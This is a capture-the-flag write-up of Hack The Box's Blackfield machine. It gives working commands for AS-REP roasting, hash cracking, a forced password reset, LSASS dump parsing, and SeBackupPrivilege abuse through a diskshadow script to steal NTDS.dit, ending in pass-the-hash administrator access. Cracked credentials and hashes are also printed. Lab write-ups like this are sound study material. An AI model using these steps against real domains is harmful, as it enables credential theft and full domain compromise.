Hack The Box — Blackfield 10.10.10.192 Writeup

Fahmi J
8 min readOct 4, 2020

--

Blackfield is a hard difficulty Windows machine that features Active Directory environment. It begins with collecting a list of usernames from an SMB share. With these usernames, I’m able to perform AS-REP roasting attack and obtain a TGT from a helpdesk account. The helpdesk account can be used to reset the password of an audit account. Re-enumerating SMB shares using the audit account finds an LSASS memory dump file.

The dump file contains an NT hash of a service account that is a member of Backup Operators. The privileges of the Backup Operators group can be abused to create a volume shadow copy and pull the NTDS.dit file from there. With the NTDS.dit file, I'm able to retrieves the NT hash of the administrator account, and then perform pass-the-hash attack to gain administrator access.

Reconnaissance

Nmap

nmap -sC -sV -oN initial-blackfield 10.10.10.192

An initial TCP scan with nmap discovered at least seven open ports. These ports are the typical port used by Active Directory Domain Controller (AD DC).

I’ll summarize the result:

  • There is a DNS service on port 53, but HTB box is a single machine, so enumerating this service is not priority.
  • There is a Kerberos service on port 88 is running Kerberos. I can try AS-REP roasting here.
  • There is MS-RPC service on port 135, which I don’t touch it really often, so I’ll lower the priority.
  • There is an LDAP service on port 389, LDAP is the standard protocol for directory services. Active Directory is Microsoft’s implementation of directory services and it supports LDAP query.
  • There is an SMB service on port 445. I can try anonymous login here.
  • Port 3268 is running LDAP as well, but it’s used as global catalog (read more: here).

nmap also identified the AD domain name is blackfield.local.

TCP 389 — LDAP

On LDAP, I can send a query to obtain the domain metadata, but first I’ll look into the rootDSE to retrieve a list of the domain naming context.

ldapsearch -LLL -x -h 10.10.10.192 -s base namingContexts
  • -LLL : don’t show comments
  • -x : use simple authentication
  • -h : hostname or ip
  • -s : search scope on base or rootDSE

I can use DC=BLACKFIELD,DC=local (this is called as distinguished name), but unfortunately the anonymous bind is not allowed.

ldapsearch -LLL -x -h 10.10.10.192 -b "DC=BLACKFIELD,DC=local"

But unfortunately, the anonymous bind is not allowed.

TCP 445 — SMB

Trying anonymous login with crackmapexec returns a status access denied.

crackmapexec smb 10.10.10.192 -u '' -p '' --shares

But with smbclient, it return the shares list.

Later, I came to know that ‘anonymous’ must be specified in crackmapexec.

crackmapexec ‘anonymous’ vs empty string

I have read permission on the profile$ share. The share contains a bunch of empty users folder.

I can convert these folders name to list of username using awk '{print $1}'.

Now that I have a list of usernames, I can try AS-REP roast attack on Kerberos

TCP 88 — Kerberos

I’ll use GetNPUsers.py to perform AS-REP roasting on Kerberos.

GetNPUsers.py BLACKFIELD.LOCAL/ -no-pass -usersfile asreproast -dc-ip 10.10.10.192 -outputfile TGT_AS-REP

And watching the output file using watch command

watch -n 1 cat TGT_AS-REP

I’ll send the hash to my Windows for cracking.

:: Cracking the Hash

I’ll use dictionary attack to recover the user password using hashcat, and it cracks within a few seconds.

hashcat -m 18200 hashes/blackfield.hash rockyou.txt -O

The password for user support is #00^BlackKnight.

Access as support

Now that I obtained a set of credentials, I can re-enumerate the available services.

:: LDAP Domain Dump

ldapdomaindump -u ‘BLACKFIELD.LOCAL\support’ -p ‘#00^BlackKnight’ -no-json -no-grep 10.10.10.192

The credentials works on LDAP, I can use it to obtain the domain info using ldapdomaindump.

The output from the tool are formatted in HTML document, and I get the following information:

The OS information and the computer FQDN.

The domain policy.

Interesting domain users.

Interesting groups

From here, I know that user support does not have remote shell access like WinRM.

:: Bloodhound

There is a python-based ingestor for BloodHound besides SharpHound. It can be used remotely from Linux.

python bloodhound.py -c All -u 'support@blackfield.local' -p '#00^BlackKnight' -d blackfield.local -dc DC01.BLACKFIELD.local -ns 10.10.10.192
  • -c: collect method : all
  • -u,-p: credentials set
  • -d: domain name
  • -dc: FQDN of domain controller (it’s on ldap domain dump section → domain_computers.html)
  • -ns: name server / DNS

It returns the following output:

My default python is python2

The output files from the tool are in json format. They are: computers.json, domains.json, groups.json and users.json.

I can upload these files to BloodHound GUI by drag and drop.

Enumerating the user support permissions discovers it has ForceChangePassword permission on Audit2020. That means user support is able to change the user audit2020 password.

:: Reset Audit2020 Password

I can change the user audit2020 password using net rpc. I’ll set P@$$w0rd! as the new password for user audit2020.

net rpc password audit2020 -U ‘support%#00^BlackKnight’ -S 10.10.10.192

Access as Audit2020

:: forensic share

With audit2020, I can access the forensic share.

smbmap -H 10.10.10.192 -u audit2020 -p 'P@$$w0rd!'

Inside the share, there is three folders, and I’ll download all of them to my Kali.

smbclient -U ‘audit2020%P@$$w0rd!’ //10.10.10.192/forensic

Enumerating on the memory_analysis folder, there is a file called lsass.zip that contains lsass.DMP which is interesting to me.

lsass (local security authentication subsystem service) is a service/process that used to verify and authenticate users on login to a windows computer. In short, it holds the credentials from the windows registry, CMIIW

I can use a tool called pypykatz to dump the contents of lsass.DMP, and the NT hash of svc-backup immediately shows up on the top

svc_backup:9658d1d1dcd9250115e2205d9f48400d

Foothold

Remote Access

I already know that svc_backup can login remotely (from LDAP), so I can try it with evil-winrm, and it works.

Evil-winrm -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'

User flag is done here. *Actually I found a notes.txt in C:\, I’ll just skip that here.

Privileges Escalation

Internal enumeration

Also from LDAP, we know svc-backup is a member of the Backup Operators group. Each member of the Backup Operators group can perform backup and restore operations. The privilege name to perform those two operations are called SeBackupPrivilege and SeRestorePrivilege.

Those two privileges can be abused using diskshadow(check out the references on the bottom of this writeup for sources).

I can’t just perform the backup and restore if the system is currently in use. But, there is a technology from Microsoft called “Shadow Copy” that makes this possible, and that’s where diskshadow will be used.

So the idea is that I can create a volume shadow of C:\ drive and backup the NTDS.dit file (AD database) from the volume shadow back to C:\ drive. After that I can grab the ntds.dit and dump the NT hashes from NTDS.dit locally using secretsdump.py.

Abusing SeBackupPrivilege

To abuse this privilege I’ll use this gist as reference as well as this module.

Then, I’ll create two scripts to perform all the needed actions (create a volume, grab ntds.dit, and cleanup the volume shadow) in one shot.

First, the script for grabbing ntds.dit, I’ll save it as copy.cmd

cmd.exe /c "powershell.exe -c Import-Module(Resolve-Path('SeBackupPrivilegeCmdLets.dll')); Import-Module(Resolve-Path('SeBackupPrivilegeCmdLets.dll')); Copy-FileSeBackupPrivilege f:\windows\ntds\ntds.dit C:\temp\ntds.dit"

Second, the script for creating and deleting the volume shadow, I’ll save it as script.txt.

set context persistent nowriters 
add volume c: alias iamf
create
expose %iamf% f:
exec "copy.cmd"
delete shadows volume %iamf%
reset

I’ll move the modules and the scripts to a folder called exploits.

Now, I’ll copy these .dll modules, copy.cmd, and script.txt to Blackfield using upload feature from evil-winrm at C:\temp\.

After that, I can run diskshadow with the /s option and specify script.txt as the command sequence.

Evil-WinRM* PS C:\temp> diskshadow /s script.txt

Now that I have the ntds.dit, the last file that I need is the registry hive.

Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system
The operation completed successfully.

I’ll download these files to my Kali using evil-winrm download feature.

Credential Dumping

Now I can dump the NT hash from ntds.dit and system file using secretsdump.py.

secretsdump.py -system system -ntds ntds.dit LOCAL

Remote Access

I can use the NT hash of administrator account to login using evil-winrm pass-the-hash feature.

evil-winrm -i 10.10.10.192 -u administrator -H ‘184fb5e5178480be64824d4cd53b99ee’

--

--

Fahmi J
Fahmi J

Written by Fahmi J

Just curious to learn how things work, especially in digital world.

No responses yet